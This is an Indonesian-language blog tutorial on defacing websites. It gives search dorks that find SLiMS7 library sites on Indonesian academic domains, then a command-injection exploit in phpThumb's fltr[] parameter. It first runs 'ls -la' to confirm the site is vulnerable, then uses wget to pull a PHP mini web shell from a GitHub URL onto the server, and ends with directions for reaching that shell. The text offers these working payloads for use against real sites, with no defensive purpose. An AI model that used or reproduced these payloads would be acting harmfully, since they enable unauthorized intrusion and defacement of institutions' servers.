Oke pada artikel kali ini saya akan memberi tutorial deface lagi :D
Dork:
inurl:/index.php?p=show_detail&id= "Detail Cantuman" site:ac.id
"Powered By Slims7" site:ac.id
Atau pake dork ini:Klik me
Exploit buat cek vuln/ngga web nya:
/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;ls -la;%20&phpThumbDebug=9
Exploit buat upload shell nya:
/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/eviltwin-dev/eviltwin-minishell/master/mini.php;%20&phpThumbDebug=9
Yap disini gua pake mini shell dari evil twin :D
Oke langkah pertama kalian cari target nya,lalu kalian kasih exploit di belakang domain nya/path nya contoh
http://hwkerbang.com/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;ls -la;%20&phpThumbDebug=9
Jika ada path nya,taro di belakang path nya :D
Ciri²vuln bakal keluar dir dari web nya,contoh gini
Sekrng kita upload shell kita,cara nya kalian hapus exploit tadi lalu ganti dengan exploit yang ku kasih di atas,nih ku contohin lgi
http://hekerbang.com/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/eviltwin-dev/eviltwin-minishell/master/mini.php;%20&phpThumbDebug=9
Maka tampilan nya akan seperti ini
Yap sekrng kita akses shell kita,cara nya
http://hekerbang.com//lib/watermark/mini.php
http://hekerbang.com/path//lib/watermark/mini.php
Dan bom shell ku terupload
Via youtube: